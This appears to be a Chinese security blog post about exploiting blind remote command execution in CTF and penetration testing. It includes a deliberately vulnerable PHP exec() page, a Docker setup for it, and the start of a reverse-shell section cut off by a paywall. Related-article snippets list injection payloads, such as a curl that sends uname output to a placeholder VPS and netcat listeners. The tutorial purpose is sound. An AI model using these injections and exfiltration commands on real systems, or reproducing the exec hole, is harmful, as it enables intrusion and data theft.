无回显RCE

原创 于 2025-04-20 16:42:19 发布 · 645 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #php

在CTF和实战渗透中,不是每一个命令执行点都有回显,有时我们审了半天代码,却发现好不容易找到的命令执行没有回显,但是这并不代表这段代码不能被我们利用,在无回显的情况下也是可以利用的

首先我们来写一个最简单的php命令执行的代码,因为是测试,就不加WAF了

<?php
highlight_file(__FILE__);
$a=$_GET['a'];
exec("$a");
?>

这里用docker拉了个apache下来

FROM php:8.2-apache

# 拷贝你自己的 index.php 到网页根目录
COPY index.php /var/www/html/index.php

# 开启 Apache 的 mod_rewrite(可选)
RUN a2enmod rewrite

# 设置工作目录权限(避免权限问题)
RUN chown -R www-data:www-data /var/www/html

这样测试,若5秒后响应说明可以命令执行

1. 反弹shell

遇到这种无回显的命令执行,最常见的思路是反弹shell,因为它虽然不会将命令执行的结果输出在屏幕上,但实际上这个命令它是执行了的,那我们就将shell反弹到自己服务器上,然后再执行命令肯定就可以看到回显了

最低0.47元/天 解锁文章
rce无回显剖析
姜小孩的博客
12-12 5575
在ctf中,有时会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否被执行,借着这次总结rce的机会,就把它一起总结了
RCE绕过之无回显
Ciyaso的博客
07-23 3912
①shell_exec等无回显函数。 判断方法: ls;sleep(3) 利用: Ⅰ.复制,压缩,写shell等方法 copy flag.php flag.txt mv flag.php flag.txt cat flag.php > flag.txt Ⅱ.压缩方法 tar cvf flag.tar flag.php #tar压缩 tar zcvf flag.tar.gz flag.php #tar解压 zip flag.zip flag.php #zip压缩 unzip flag.
无回显命令执行漏洞之Linux渗透
K8哥哥
07-11 1057
前言 很多时候命令回显漏洞由于一些特殊原因,无法构造或不方便构造回显,上回讲到JAVA反序列化漏洞Ladon回显方法。本文针对Linux系统实现命令执行漏洞回显方法,虽说JAVA跨平台但并不代表所有系统都预装有JAVA,实际上.NET一样是跨平台的,前提都要系统安装才可以,那么对于未安装JAVA的机器或非JAVA程序产生的命令执行漏洞,如何实现命令回显,将是本文讲述的重点。JAVA篇:http://k8gege.org/Ladon/web_javarce.html PowerShell篇:http://k8
带外攻击(OOB)RCE无回显思路总结详解
qq_71467825的博客
06-23 2903
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
rce无回显
qq_62046696的博客
07-20 5692
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
RCE篇之无回显rce
mingyqf的博客
01-13 2623
原文链接:http://arsenetang.com/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/
[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等
m0_64180167的博客
10-05 470
扫除git通过githack获取index.php发现是命令执行 并且存在过滤我们之前使用的 print_r(dirname(__FILE__));在这里不可以使用。
exec无回显rce在只有1234567890\<$没有被过滤的情况下怎么进行绕过
最新发布
03-09
好的,我现在需要帮助用户解决如何利用未被过滤的数字和特殊字符绕过exec无回显RCE限制的问题。首先,我得仔细理解用户的需求。用户提到在特定字符未被过滤的情况下执行RCE,特别是数字和特殊字符没有被过滤,而exec...
浅析罗尔斯的无知之幕论文/浅析无回显的XXE(Blind XXE)_小白黑客详细教程
2401_84915584的博客
05-17 534
xml介绍XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。
无回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 764
在渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显的命令执行点。面对这些无回显的命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显的命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
091-从无回显命令执行到getshell的渗透测试.pdf
RCE无回显漏洞利用
qq_32947907的博客
01-22 2035
除了上面的一些常见的方式以外,还有其它的如ICMP协议外带等等。参考链接带外攻击OOB(RCE无回显骚思路总结)-腾讯云开发者社区-腾讯云不积跬步,无以至千里;不积小流,无以成江河。
Web无回显RCE相关例题wp(1)
uuzeray的博客
11-13 1196
这块还是很有嚼头的,准备分几次总结命令执行无回显rce思路:1.利用dnslog带外2.写马3.反弹shell4.写文件然后访问文件。
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2728
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
SuperherRo的博客
10-25 1225
1、RCE-原理-代码执行&命令执行 2、RCE-黑白盒-过滤绕过&不回显方案
Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
qq_61553520的博客
03-30 2551
小迪安全-Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
浅谈PHP无回显命令执行
qidiandexiaowu
11-09 1330
以前学过有回显的命令执行,但是无回显的还是第一次接触,这次就记录下来。 判断方法: 1.审计代码(我也不是很会) 2.延时判断 ip=|sleep 5 时间延长了就可能有无回显命令执行。 3.HTTP请求 ①在公网服务器监听监听端口 nc -lp 4444 ②向目标服务器发起http请求,执行curl命令 ip=|curl ip:4444 如果公网服务器能从监听端口得到一些信息,那麽他就可能存在无回显命令执行。 4.DNS请求 第一步 在解析的时候浏览器会检查缓存中有没有域名对应的ip地址,这个缓
php--无回显情况下的命令执行
金灰的博客
06-02 1569
免责声明:本文仅做技术交流与学习...建立通道(信道) --数据传输的路径shell_exec 与 system 相比,shell_exec没有回显结果.
[CTF]命令执行无回显利用
热门推荐
cosmoslin的博客
02-21 1万+
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值